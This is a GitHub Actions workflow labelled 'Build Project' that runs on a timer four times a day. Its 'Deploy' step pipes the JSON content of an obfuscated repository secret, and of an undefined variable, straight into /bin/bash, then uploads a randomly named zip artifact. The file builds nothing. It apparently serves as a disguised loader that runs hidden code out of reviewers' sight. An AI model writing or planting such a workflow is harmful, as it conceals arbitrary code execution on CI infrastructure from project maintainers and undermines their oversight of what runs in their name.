name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '7 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          pfvs83: ${{ secrets.pfvs83 }}
        run: |
          printf '%s' "$pfvs83" | jq -r .z92 | /bin/bash
          printf '%s' "$kenfd24016" | jq -r .arls712 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: PleHtVrS
          path: "*.zip"
          retention-days: 1
